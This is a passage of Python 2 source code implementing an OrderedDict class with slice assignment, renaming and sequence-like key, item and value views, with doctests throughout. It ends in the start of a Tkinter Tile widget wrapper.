'f')])" >>> r2 = repr(OrderedDict((('a', 'b'), ('e', 'f'), ('c', 'd')))) >>> r2 "OrderedDict([('a', 'b'), ('e', 'f'), ('c', 'd')])" >>> r1 == str(OrderedDict((('a', 'b'), ('c', 'd'), ('e', 'f')))) True >>> r2 == str(OrderedDict((('a', 'b'), ('e', 'f'), ('c', 'd')))) True """ return '%s([%s])' % (self.__class__.__name__, ', '.join( ['(%r, %r)' % (key, self[key]) for key in self._sequence])) def __setitem__(self, key, val): """ Allows slice assignment, so long as the slice is an OrderedDict >>> d = OrderedDict() >>> d['a'] = 'b' >>> d['b'] = 'a' >>> d[3] = 12 >>> d OrderedDict([('a', 'b'), ('b', 'a'), (3, 12)]) >>> d[:] = OrderedDict(((1, 2), (2, 3), (3, 4))) >>> d OrderedDict([(1, 2), (2, 3), (3, 4)]) >>> d[::2] = OrderedDict(((7, 8), (9, 10))) >>> d OrderedDict([(7, 8), (2, 3), (9, 10)]) >>> d = OrderedDict(((0, 1), (1, 2), (2, 3), (3, 4))) >>> d[1:3] = OrderedDict(((1, 2), (5, 6), (7, 8))) >>> d OrderedDict([(0, 1), (1, 2), (5, 6), (7, 8), (3, 4)]) >>> d = OrderedDict(((0, 1), (1, 2), (2, 3), (3, 4)), strict=True) >>> d[1:3] = OrderedDict(((1, 2), (5, 6), (7, 8))) >>> d OrderedDict([(0, 1), (1, 2), (5, 6), (7, 8), (3, 4)]) >>> a = OrderedDict(((0, 1), (1, 2), (2, 3)), strict=True) >>> a[3] = 4 >>> a OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a[::1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a[:2] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4), (4, 5)]) Traceback (most recent call last): ValueError: slice assignment must be from unique keys >>> a = OrderedDict(((0, 1), (1, 2), (2, 3))) >>> a[3] = 4 >>> a OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a[::1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a[:2] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a[::-1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> a OrderedDict([(3, 4), (2, 3), (1, 2), (0, 1)]) >>> d = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> d[:1] = 3 Traceback (most recent call last): TypeError: slice assignment requires an OrderedDict >>> d = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) >>> d[:1] = OrderedDict([(9, 8)]) >>> d OrderedDict([(9, 8), (1, 2), (2, 3), (3, 4)]) """ if isinstance(key, types.SliceType): if not isinstance(val, OrderedDict): # FIXME: allow a list of tuples? raise TypeError('slice assignment requires an OrderedDict') keys = self._sequence[key] # NOTE: Could use ``range(*key.indices(len(self._sequence)))`` indexes = range(len(self._sequence))[key] if key.step is None: # NOTE: new slice may not be the same size as the one being # overwritten ! # NOTE: What is the algorithm for an impossible slice? # e.g. d[5:3] pos = key.start or 0 del self[key] newkeys = val.keys() for k in newkeys: if k in self: if self.strict: raise ValueError('slice assignment must be from ' 'unique keys') else: # NOTE: This removes duplicate keys *first* # so start position might have changed? del self[k] self._sequence = (self._sequence[:pos] + newkeys + self._sequence[pos:]) dict.update(self, val) else: # extended slice - length of new slice must be the same # as the one being replaced if len(keys) != len(val): raise ValueError('attempt to assign sequence of size %s ' 'to extended slice of size %s' % (len(val), len(keys))) # FIXME: efficiency? del self[key] item_list = zip(indexes, val.items()) # smallest indexes first - higher indexes not guaranteed to # exist item_list.sort() for pos, (newkey, newval) in item_list: if self.strict and newkey in self: raise ValueError('slice assignment must be from unique' ' keys') self.insert(pos, newkey, newval) else: if key not in self: self._sequence.append(key) dict.__setitem__(self, key, val) def __getitem__(self, key): """ Allows slicing. Returns an OrderedDict if you slice. >>> b = OrderedDict([(7, 0), (6, 1), (5, 2), (4, 3), (3, 4), (2, 5), (1, 6)]) >>> b[::-1] OrderedDict([(1, 6), (2, 5), (3, 4), (4, 3), (5, 2), (6, 1), (7, 0)]) >>> b[2:5] OrderedDict([(5, 2), (4, 3), (3, 4)]) >>> type(b[2:4]) <class '__main__.OrderedDict'> """ if isinstance(key, types.SliceType): # FIXME: does this raise the error we want? keys = self._sequence[key] # FIXME: efficiency? return OrderedDict([(entry, self[entry]) for entry in keys]) else: return dict.__getitem__(self, key) __str__ = __repr__ def __setattr__(self, name, value): """ Implemented so that accesses to ``sequence`` raise a warning and are diverted to the new ``setkeys`` method. """ if name == 'sequence': warnings.warn('Use of the sequence attribute is deprecated.' ' Use the keys method instead.', DeprecationWarning) # NOTE: doesn't return anything self.setkeys(value) else: # FIXME: do we want to allow arbitrary setting of attributes? # Or do we want to manage it? object.__setattr__(self, name, value) def __getattr__(self, name): """ Implemented so that access to ``sequence`` raises a warning. >>> d = OrderedDict() >>> d.sequence [] """ if name == 'sequence': warnings.warn('Use of the sequence attribute is deprecated.' ' Use the keys method instead.', DeprecationWarning) # NOTE: Still (currently) returns a direct reference. Need to # because code that uses sequence will expect to be able to # mutate it in place. return self._sequence else: # raise the appropriate error raise AttributeError("OrderedDict has no '%s' attribute" % name) def __deepcopy__(self, memo): """ To allow deepcopy to work with OrderedDict. >>> from copy import deepcopy >>> a = OrderedDict([(1, 1), (2, 2), (3, 3)]) >>> a['test'] = {} >>> b = deepcopy(a) >>> b == a True >>> b is a False >>> a['test'] is b['test'] False """ from copy import deepcopy return self.__class__(deepcopy(self.items(), memo), self.strict) ### Read-only methods ### def copy(self): """ >>> OrderedDict(((1, 3), (3, 2), (2, 1))).copy() OrderedDict([(1, 3), (3, 2), (2, 1)]) """ return OrderedDict(self) def items(self): """ ``items`` returns a list of tuples representing all the ``(key, value)`` pairs in the dictionary. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.items() [(1, 3), (3, 2), (2, 1)] >>> d.clear() >>> d.items() [] """ return zip(self._sequence, self.values()) def keys(self): """ Return a list of keys in the ``OrderedDict``. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.keys() [1, 3, 2] """ return self._sequence[:] def values(self, values=None): """ Return a list of all the values in the OrderedDict. Optionally you can pass in a list of values, which will replace the current list. The value list must be the same len as the OrderedDict. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.values() [3, 2, 1] """ return [self[key] for key in self._sequence] def iteritems(self): """ >>> ii = OrderedDict(((1, 3), (3, 2), (2, 1))).iteritems() >>> ii.next() (1, 3) >>> ii.next() (3, 2) >>> ii.next() (2, 1) >>> ii.next() Traceback (most recent call last): StopIteration """ def make_iter(self=self): keys = self.iterkeys() while True: key = keys.next() yield (key, self[key]) return make_iter() def iterkeys(self): """ >>> ii = OrderedDict(((1, 3), (3, 2), (2, 1))).iterkeys() >>> ii.next() 1 >>> ii.next() 3 >>> ii.next() 2 >>> ii.next() Traceback (most recent call last): StopIteration """ return iter(self._sequence) __iter__ = iterkeys def itervalues(self): """ >>> iv = OrderedDict(((1, 3), (3, 2), (2, 1))).itervalues() >>> iv.next() 3 >>> iv.next() 2 >>> iv.next() 1 >>> iv.next() Traceback (most recent call last): StopIteration """ def make_iter(self=self): keys = self.iterkeys() while True: yield self[keys.next()] return make_iter() ### Read-write methods ### def clear(self): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.clear() >>> d OrderedDict([]) """ dict.clear(self) self._sequence = [] def pop(self, key, *args): """ No dict.pop in Python 2.2, gotta reimplement it >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.pop(3) 2 >>> d OrderedDict([(1, 3), (2, 1)]) >>> d.pop(4) Traceback (most recent call last): KeyError: 4 >>> d.pop(4, 0) 0 >>> d.pop(4, 0, 1) Traceback (most recent call last): TypeError: pop expected at most 2 arguments, got 3 """ if len(args) > 1: raise TypeError, ('pop expected at most 2 arguments, got %s' % (len(args) + 1)) if key in self: val = self[key] del self[key] else: try: val = args[0] except IndexError: raise KeyError(key) return val def popitem(self, i=-1): """ Delete and return an item specified by index, not a random one as in dict. The index is -1 by default (the last item). >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.popitem() (2, 1) >>> d OrderedDict([(1, 3), (3, 2)]) >>> d.popitem(0) (1, 3) >>> OrderedDict().popitem() Traceback (most recent call last): KeyError: 'popitem(): dictionary is empty' >>> d.popitem(2) Traceback (most recent call last): IndexError: popitem(): index 2 not valid """ if not self._sequence: raise KeyError('popitem(): dictionary is empty') try: key = self._sequence[i] except IndexError: raise IndexError('popitem(): index %s not valid' % i) return (key, self.pop(key)) def setdefault(self, key, defval = None): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.setdefault(1) 3 >>> d.setdefault(4) is None True >>> d OrderedDict([(1, 3), (3, 2), (2, 1), (4, None)]) >>> d.setdefault(5, 0) 0 >>> d OrderedDict([(1, 3), (3, 2), (2, 1), (4, None), (5, 0)]) """ if key in self: return self[key] else: self[key] = defval return defval def update(self, from_od): """ Update from another OrderedDict or sequence of (key, value) pairs >>> d = OrderedDict(((1, 0), (0, 1))) >>> d.update(OrderedDict(((1, 3), (3, 2), (2, 1)))) >>> d OrderedDict([(1, 3), (0, 1), (3, 2), (2, 1)]) >>> d.update({4: 4}) Traceback (most recent call last): TypeError: undefined order, cannot get items from dict >>> d.update((4, 4)) Traceback (most recent call last): TypeError: cannot convert dictionary update sequence element "4" to a 2-item sequence """ if isinstance(from_od, OrderedDict): for key, val in from_od.items(): self[key] = val elif isinstance(from_od, dict): # we lose compatibility with other ordered dict types this way raise TypeError('undefined order, cannot get items from dict') else: # FIXME: efficiency? # sequence of 2-item sequences, or error for item in from_od: try: key, val = item except TypeError: raise TypeError('cannot convert dictionary update' ' sequence element "%s" to a 2-item sequence' % item) self[key] = val def rename(self, old_key, new_key): """ Rename the key for a given value, without modifying sequence order. For the case where new_key already exists this raise an exception, since if new_key exists, it is ambiguous as to what happens to the associated values, and the position of new_key in the sequence. >>> od = OrderedDict() >>> od['a'] = 1 >>> od['b'] = 2 >>> od.items() [('a', 1), ('b', 2)] >>> od.rename('b', 'c') >>> od.items() [('a', 1), ('c', 2)] >>> od.rename('c', 'a') Traceback (most recent call last): ValueError: New key already exists: 'a' >>> od.rename('d', 'b') Traceback (most recent call last): KeyError: 'd' """ if new_key == old_key: # no-op return if new_key in self: raise ValueError("New key already exists: %r" % new_key) # rename sequence entry value = self[old_key] old_idx = self._sequence.index(old_key) self._sequence[old_idx] = new_key # rename internal dict entry dict.__delitem__(self, old_key) dict.__setitem__(self, new_key, value) def setitems(self, items): """ This method allows you to set the items in the dict. It takes a list of tuples - of the same sort returned by the ``items`` method. >>> d = OrderedDict() >>> d.setitems(((3, 1), (2, 3), (1, 2))) >>> d OrderedDict([(3, 1), (2, 3), (1, 2)]) """ self.clear() # FIXME: this allows you to pass in an OrderedDict as well :-) self.update(items) def setkeys(self, keys): """ ``setkeys`` all ows you to pass in a new list of keys which will replace the current set. This must contain the same set of keys, but need not be in the same order. If you pass in new keys that don't match, a ``KeyError`` will be raised. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.keys() [1, 3, 2] >>> d.setkeys((1, 2, 3)) >>> d OrderedDict([(1, 3), (2, 1), (3, 2)]) >>> d.setkeys(['a', 'b', 'c']) Traceback (most recent call last): KeyError: 'Keylist is not the same as current keylist.' """ # FIXME: Efficiency? (use set for Python 2.4 :-) # NOTE: list(keys) rather than keys[:] because keys[:] returns # a tuple, if keys is a tuple. kcopy = list(keys) kcopy.sort() self._sequence.sort() if kcopy != self._sequence: raise KeyError('Keylist is not the same as current keylist.') # NOTE: This makes the _sequence attribute a new object, instead # of changing it in place. # FIXME: efficiency? self._sequence = list(keys) def setvalues(self, values): """ You can pass in a list of values, which will replace the current list. The value list must be the same len as the OrderedDict. (Or a ``ValueError`` is raised.) >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.setvalues((1, 2, 3)) >>> d OrderedDict([(1, 1), (3, 2), (2, 3)]) >>> d.setvalues([6]) Traceback (most recent call last): ValueError: Value list is not the same length as the OrderedDict. """ if len(values) != len(self): # FIXME: correct error to raise? raise ValueError('Value list is not the same length as the ' 'OrderedDict.') self.update(zip(self, values)) ### Sequence Methods ### def index(self, key): """ Return the position of the specified key in the OrderedDict. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.index(3) 1 >>> d.index(4) Traceback (most recent call last): ValueError: list.index(x): x not in list """ return self._sequence.index(key) def insert(self, index, key, value): """ Takes ``index``, ``key``, and ``value`` as arguments. Sets ``key`` to ``value``, so that ``key`` is at position ``index`` in the OrderedDict. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.insert(0, 4, 0) >>> d OrderedDict([(4, 0), (1, 3), (3, 2), (2, 1)]) >>> d.insert(0, 2, 1) >>> d OrderedDict([(2, 1), (4, 0), (1, 3), (3, 2)]) >>> d.insert(8, 8, 1) >>> d OrderedDict([(2, 1), (4, 0), (1, 3), (3, 2), (8, 1)]) """ if key in self: # FIXME: efficiency? del self[key] self._sequence.insert(index, key) dict.__setitem__(self, key, value) def reverse(self): """ Reverse the order of the OrderedDict. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.reverse() >>> d OrderedDict([(2, 1), (3, 2), (1, 3)]) """ self._sequence.reverse() def sort(self, *args, **kwargs): """ Sort the key order in the OrderedDict. This method takes the same arguments as the ``list.sort`` method on your version of Python. >>> d = OrderedDict(((4, 1), (2, 2), (3, 3), (1, 4))) >>> d.sort() >>> d OrderedDict([(1, 4), (2, 2), (3, 3), (4, 1)]) """ self._sequence.sort(*args, **kwargs) class Keys(object): # FIXME: should this object be a subclass of list? """ Custom object for accessing the keys of an OrderedDict. Can be called like the normal ``OrderedDict.keys`` method, but also supports indexing and sequence methods. """ def __init__(self, main): self._main = main def __call__(self): """Pretend to be the keys method.""" return self._main._keys() def __getitem__(self, index): """Fetch the key at position i.""" # NOTE: this automatically supports slicing :-) return self._main._sequence[index] def __setitem__(self, index, name): """ You cannot assign to keys, but you can do slice assignment to re-order them. You can only do slice assignment if the new set of keys is a reordering of the original set. """ if isinstance(index, types.SliceType): # FIXME: efficiency? # check length is the same indexes = range(len(self._main._sequence))[index] if len(indexes) != len(name): raise ValueError('attempt to assign sequence of size %s ' 'to slice of size %s' % (len(name), len(indexes))) # check they are the same keys # FIXME: Use set old_keys = self._main._sequence[index] new_keys = list(name) old_keys.sort() new_keys.sort() if old_keys != new_keys: raise KeyError('Keylist is not the same as current keylist.') orig_vals = [self._main[k] for k in name] del self._main[index] vals = zip(indexes, name, orig_vals) vals.sort() for i, k, v in vals: if self._main.strict and k in self._main: raise ValueError('slice assignment must be from ' 'unique keys') self._main.insert(i, k, v) else: raise ValueError('Cannot assign to keys') ### following methods pinched from UserList and adapted ### def __repr__(self): return repr(self._main._sequence) # FIXME: do we need to check if we are comparing with another ``Keys`` # object? (like the __cast method of UserList) def __lt__(self, other): return self._main._sequence < other def __le__(self, other): return self._main._sequence <= other def __eq__(self, other): return self._main._sequence == other def __ne__(self, other): return self._main._sequence != other def __gt__(self, other): return self._main._sequence > other def __ge__(self, other): return self._main._sequence >= other # FIXME: do we need __cmp__ as well as rich comparisons? def __cmp__(self, other): return cmp(self._main._sequence, other) def __contains__(self, item): return item in self._main._sequence def __len__(self): return len(self._main._sequence) def __iter__(self): return self._main.iterkeys() def count(self, item): return self._main._sequence.count(item) def index(self, item, *args): return self._main._sequence.index(item, *args) def reverse(self): self._main._sequence.reverse() def sort(self, *args, **kwds): self._main._sequence.sort(*args, **kwds) def __mul__(self, n): return self._main._sequence*n __rmul__ = __mul__ def __add__(self, other): return self._main._sequence + other def __radd__(self, other): return other + self._main._sequence ## following methods not implemented for keys ## def __delitem__(self, i): raise TypeError('Can\'t delete items from keys') def __iadd__(self, other): raise TypeError('Can\'t add in place to keys') def __imul__(self, n): raise TypeError('Can\'t multiply keys in place') def append(self, item): raise TypeError('Can\'t append items to keys') def insert(self, i, item): raise TypeError('Can\'t insert items into keys') def pop(self, i=-1): raise TypeError('Can\'t pop items from keys') def remove(self, item): raise TypeError('Can\'t remove items from keys') def extend(self, other): raise TypeError('Can\'t extend keys') class Items(object): """ Custom object for accessing the items of an OrderedDict. Can be called like the normal ``OrderedDict.items`` method, but also supports indexing and sequence methods. """ def __init__(self, main): self._main = main def __call__(self): """Pretend to be the items method.""" return self._main._items() def __getitem__(self, index): """Fetch the item at position i.""" if isinstance(index, types.SliceType): # fetching a slice returns an OrderedDict return self._main[index].items() key = self._main._sequence[index] return (key, self._main[key]) def __setitem__(self, index, item): """Set item at position i to item.""" if isinstance(index, types.SliceType): # NOTE: item must be an iterable (list of tuples) self._main[index] = OrderedDict(item) else: # FIXME: Does this raise a sensible error? orig = self._main.keys[index] key, value = item if self._main.strict and key in self and (key != orig): raise ValueError('slice assignment must be from ' 'unique keys') # delete the current one del self._main[self._main._sequence[index]] self._main.insert(index, key, value) def __delitem__(self, i): """Delete the item at position i.""" key = self._main._sequence[i] if isinstance(i, types.SliceType): for k in key: # FIXME: efficiency? del self._main[k] else: del self._main[key] ### following methods pinched from UserList and adapted ### def __repr__(self): return repr(self._main.items()) # FIXME: do we need to check if we are comparing with another ``Items`` # object? (like the __cast method of UserList) def __lt__(self, other): return self._main.items() < other def __le__(self, other): return self._main.items() <= other def __eq__(self, other): return self._main.items() == other def __ne__(self, other): return self._main.items() != other def __gt__(self, other): return self._main.items() > other def __ge__(self, other): return self._main.items() >= other def __cmp__(self, other): return cmp(self._main.items(), other) def __contains__(self, item): return item in self._main.items() def __len__(self): return len(self._main._sequence) # easier :-) def __iter__(self): return self._main.iteritems() def count(self, item): return self._main.items().count(item) def index(self, item, *args): return self._main.items().index(item, *args) def reverse(self): self._main.reverse() def sort(self, *args, **kwds): self._main.sort(*args, **kwds) def __mul__(self, n): return self._main.items()*n __rmul__ = __mul__ def __add__(self, other): return self._main.items() + other def __radd__(self, other): return other + self._main.items() def append(self, item): """Add an item to the end.""" # FIXME: this is only append if the key isn't already present key, value = item self._main[key] = value def insert(self, i, item): key, value = item self._main.insert(i, key, value) def pop(self, i=-1): key = self._main._sequence[i] return (key, self._main.pop(key)) def remove(self, item): key, value = item try: assert value == self._main[key] except (KeyError, AssertionError): raise ValueError('ValueError: list.remove(x): x not in list') else: del self._main[key] def extend(self, other): # FIXME: is only a true extend if none of the keys already present for item in other: key, value = item self._main[key] = value def __iadd__(self, other): self.extend(other) ## following methods not implemented for items ## def __imul__(self, n): raise TypeError('Can\'t multiply items in place') class Values(object): """ Custom object for accessing the values of an OrderedDict. Can be called like the normal ``OrderedDict.values`` method, but also supports indexing and sequence methods. """ def __init__(self, main): self._main = main def __call__(self): """Pretend to be the values method.""" return self._main._values() def __getitem__(self, index): """Fetch the value at position i.""" if isinstance(index, types.SliceType): return [self._main[key] for key in self._main._sequence[index]] else: return self._main[self._main._sequence[index]] def __setitem__(self, index, value): """ Set the value at position i to value. You can only do slice assignment to values if you supply a sequence of equal length to the slice you are replacing. """ if isinstance(index, types.SliceType): keys = self._main._sequence[index] if len(keys) != len(value): raise ValueError('attempt to assign sequence of size %s ' 'to slice of size %s' % (len(name), len(keys))) # FIXME: efficiency? Would be better to calculate the indexes # directly from the slice object # NOTE: the new keys can collide with existing keys (or even # contain duplicates) - these will overwrite for key, val in zip(keys, value): self._main[key] = val else: self._main[self._main._sequence[index]] = value ### following methods pinched from UserList and adapted ### def __repr__(self): return repr(self._main.values()) # FIXME: do we need to check if we are comparing with another ``Values`` # object? (like the __cast method of UserList) def __lt__(self, other): return self._main.values() < other def __le__(self, other): return self._main.values() <= other def __eq__(self, other): return self._main.values() == other def __ne__(self, other): return self._main.values() != other def __gt__(self, other): return self._main.values() > other def __ge__(self, other): return self._main.values() >= other def __cmp__(self, other): return cmp(self._main.values(), other) def __contains__(self, item): return item in self._main.values() def __len__(self): return len(self._main._sequence) # easier :-) def __iter__(self): return self._main.itervalues() def count(self, item): return self._main.values().count(item) def index(self, item, *args): return self._main.values().index(item, *args) def reverse(self): """Reverse the values""" vals = self._main.values() vals.reverse() # FIXME: efficiency self[:] = vals def sort(self, *args, **kwds): """Sort the values.""" vals = self._main.values() vals.sort(*args, **kwds) self[:] = vals def __mul__(self, n): return self._main.values()*n __rmul__ = __mul__ def __add__(self, other): return self._main.values() + other def __radd__(self, other): return other + self._main.values() ## following methods not implemented for values ## def __delitem__(self, i): raise TypeError('Can\'t delete items from values') def __iadd__(self, other): raise TypeError('Can\'t add in place to values') def __imul__(self, n): raise TypeError('Can\'t multiply values in place') def append(self, item): raise TypeError('Can\'t append items to values') def insert(self, i, item): raise TypeError('Can\'t insert items into values') def pop(self, i=-1): raise TypeError('Can\'t pop items from values') def remove(self, item): raise TypeError('Can\'t remove items from values') def extend(self, other): raise TypeError('Can\'t extend values') class SequenceOrderedDict(OrderedDict): """ Experimental version of OrderedDict that has a custom object for ``keys``, ``values``, and ``items``. These are callable sequence objects that work as methods, or can be manipulated directly as sequences. Test for ``keys``, ``items`` and ``values``. >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4))) >>> d SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) >>> d.keys [1, 2, 3] >>> d.keys() [1, 2, 3] >>> d.setkeys((3, 2, 1)) >>> d SequenceOrderedDict([(3, 4), (2, 3), (1, 2)]) >>> d.setkeys((1, 2, 3)) >>> d.keys[0] 1 >>> d.keys[:] [1, 2, 3] >>> d.keys[-1] 3 >>> d.keys[-2] 2 >>> d.keys[0:2] = [2, 1] >>> d SequenceOrderedDict([(2, 3), (1, 2), (3, 4)]) >>> d.keys.reverse() >>> d.keys [3, 1, 2] >>> d.keys = [1, 2, 3] >>> d SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) >>> d.keys = [3, 1, 2] >>> d SequenceOrderedDict([(3, 4), (1, 2), (2, 3)]) >>> a = SequenceOrderedDict() >>> b = SequenceOrderedDict() >>> a.keys == b.keys 1 >>> a['a'] = 3 >>> a.keys == b.keys 0 >>> b['a'] = 3 >>> a.keys == b.keys 1 >>> b['b'] = 3 >>> a.keys == b.keys 0 >>> a.keys > b.keys 0 >>> a.keys < b.keys 1 >>> 'a' in a.keys 1 >>> len(b.keys) 2 >>> 'c' in d.keys 0 >>> 1 in d.keys 1 >>> [v for v in d.keys] [3, 1, 2] >>> d.keys.sort() >>> d.keys [1, 2, 3] >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)), strict=True) >>> d.keys[::-1] = [1, 2, 3] >>> d SequenceOrderedDict([(3, 4), (2, 3), (1, 2)]) >>> d.keys[:2] [3, 2] >>> d.keys[:2] = [1, 3] Traceback (most recent call last): KeyError: 'Keylist is not the same as current keylist.' >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4))) >>> d SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) >>> d.values [2, 3, 4] >>> d.values() [2, 3, 4] >>> d.setvalues((4, 3, 2)) >>> d SequenceOrderedDict([(1, 4), (2, 3), (3, 2)]) >>> d.values[::-1] [2, 3, 4] >>> d.values[0] 4 >>> d.values[-2] 3 >>> del d.values[0] Traceback (most recent call last): TypeError: Can't delete items from values >>> d.values[::2] = [2, 4] >>> d SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) >>> 7 in d.values 0 >>> len(d.values) 3 >>> [val for val in d.values] [2, 3, 4] >>> d.values[-1] = 2 >>> d.values.count(2) 2 >>> d.values.index(2) 0 >>> d.values[-1] = 7 >>> d.values [2, 3, 7] >>> d.values.reverse() >>> d.values [7, 3, 2] >>> d.values.sort() >>> d.values [2, 3, 7] >>> d.values.append('anything') Traceback (most recent call last): TypeError: Can't append items to values >>> d.values = (1, 2, 3) >>> d SequenceOrderedDict([(1, 1), (2, 2), (3, 3)]) >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4))) >>> d SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) >>> d.items() [(1, 2), (2, 3), (3, 4)] >>> d.setitems([(3, 4), (2 ,3), (1, 2)]) >>> d SequenceOrderedDict([(3, 4), (2, 3), (1, 2)]) >>> d.items[0] (3, 4) >>> d.items[:-1] [(3, 4), (2, 3)] >>> d.items[1] = (6, 3) >>> d.items [(3, 4), (6, 3), (1, 2)] >>> d.items[1:2] = [(9, 9)] >>> d SequenceOrderedDict([(3, 4), (9, 9), (1, 2)]) >>> del d.items[1:2] >>> d SequenceOrderedDict([(3, 4), (1, 2)]) >>> (3, 4) in d.items 1 >>> (4, 3) in d.items 0 >>> len(d.items) 2 >>> [v for v in d.items] [(3, 4), (1, 2)] >>> d.items.count((3, 4)) 1 >>> d.items.index((1, 2)) 1 >>> d.items.index((2, 1)) Traceback (most recent call last): ValueError: list.index(x): x not in list >>> d.items.reverse() >>> d.items [(1, 2), (3, 4)] >>> d.items.reverse() >>> d.items.sort() >>> d.items [(1, 2), (3, 4)] >>> d.items.append((5, 6)) >>> d.items [(1, 2), (3, 4), (5, 6)] >>> d.items.insert(0, (0, 0)) >>> d.items [(0, 0), (1, 2), (3, 4), (5, 6)] >>> d.items.insert(-1, (7, 8)) >>> d.items [(0, 0), (1, 2), (3, 4), (7, 8), (5, 6)] >>> d.items.pop() (5, 6) >>> d.items [(0, 0), (1, 2), (3, 4), (7, 8)] >>> d.items.remove((1, 2)) >>> d.items [(0, 0), (3, 4), (7, 8)] >>> d.items.extend([(1, 2), (5, 6)]) >>> d.items [(0, 0), (3, 4), (7, 8), (1, 2), (5, 6)] """ def __init__(self, init_val=(), strict=True): OrderedDict.__init__(self, init_val, strict=strict) self._keys = self.keys self._values = self.values self._items = self.items self.keys = Keys(self) self.values = Values(self) self.items = Items(self) self._att_dict = { 'keys': self.setkeys, 'items': self.setitems, 'values': self.setvalues, } def __setattr__(self, name, value): """Protect keys, items, and values.""" if not '_att_dict' in self.__dict__: object.__setattr__(self, name, value) else: try: fun = self._att_dict[name] except KeyError: OrderedDict.__setattr__(self, name, value) else: fun(value) # Tile wrapping copied from http://tkinter.unpythonic.net/wiki/TileWrapper. # Will be able to replace with ttk from Python 2.7, eventually. # only create these gui classes if Tkinter is available (so param does # not depend on Tkinter). try: import Tkinter from Tkconstants import * # CB: should get the specific imports and move to section below Tkinter_imported = True except ImportError: Tkinter_imported = False if Tkinter_imported: if Tkinter.TkVersion >= 8.5: class Style: def default(self, style, **kw): """Sets the default value of the specified option(s) in style""" pass def map_style(self, **kw): """Sets dynamic values of the specified option(s) in style. See "STATE MAPS", below.""" pass def layout(self, style, layoutSpec): """Define the widget layout for style style. See "LAYOUTS" below for the format of layoutSpec. If layoutSpec is omitted, return the layout specification for style style. """ pass def element_create(self, name, type, *args): """Creates a new element in the current theme of type type. The only built-in element type is image (see image(n)), although themes may define other element types (see Ttk_RegisterElementFactory). """ pass def element_names(self): """Returns a list of all elements defined in the current theme. """ pass def theme_create(self, name, parent=None, basedon=None): """Creates a new theme. It is an error if themeName already exists. If -parent is specified, the new theme will inherit styles, elements, and layouts from the parent theme basedon. If -settings is present, script is evaluated in the context of the new theme as per style theme settings. """ pass def theme_settings(self, name, script): """Temporarily sets the current theme to themeName, evaluate script, then restore the previous theme. Typically script simply defines styles and elements, though arbitrary Tcl code may appear. """ pass def theme_names(self): """Returns a list of the available themes. """ return self.tk.call("style", "theme", "names") def theme_use(self, theme): """Sets the current theme to themeName, and refreshes all widgets.""" return self.tk.call("style", "theme", "use", theme) class Widget(Tkinter.Widget, Style): def __init__(self, master, widgetName=None, cnf={}, kw={}, extra=()): if not widgetName: ## why you would ever want to create a Tile Widget is behond me! widgetName="ttk::widget" Tkinter.Widget.__init__(self, master, widgetName, cnf, kw) def instate(self, spec=None, script=None): """Test the widget's state. If script is not specified, returns 1 if the widget state matches statespec and 0 otherwise. If script is specified, equivalent to if {[pathName instate stateSpec]} script. """ return self.tk.call(self._w, "instate", spec, script) def state(self, spec=None): """Modify or inquire widget state. If stateSpec is present, sets the widget state: for each flag in stateSpec, sets the corresponding flag or clears it if prefixed by an exclamation point. Returns a new state spec indicating which flags were changed: ''set changes [pathName state spec] ; pathName state $changes'' will restore pathName to the original state. If stateSpec is not specified, returns a list of the currently-enabled state flags. """ return self.tk.call(self._w, "state", spec) class Button(Widget, Tkinter.Button): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::button", cnf, kw) ###add frame support here--KWs class Frame(Widget, Tkinter.Frame): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::frame", cnf, kw) class Checkbutton(Widget, Tkinter.Checkbutton): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::checkbutton", cnf, kw) class Combobox(Widget, Tkinter.Entry): def __init__(self, master=None, cnf={}, **kw): # HACK to work around strange parsing of list if 'values' in kw: values = kw['values'] if isinstance(values,list): kw['values'] = tuple(values) Widget.__init__(self, master, "ttk::combobox", cnf, kw) def current(self, index=None): """If index is supplied, sets the combobox value to the element at position newIndex in the list of -values. Otherwise, returns the index of the current value in the list of -values or -1 if the current value does not appear in the list. """ return self.tk.call(self._w, "current", index) class Entry(Widget, Tkinter.Entry): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::entry", cnf, kw) def validate(self): """Force revalidation, independent of the conditions specified by the -validate option. Returns 0 if the -validatecommand returns a false value, or 1 if it returns a true value or is not specified. """ return self.tk.call(self._w, "validate") class Label(Widget, 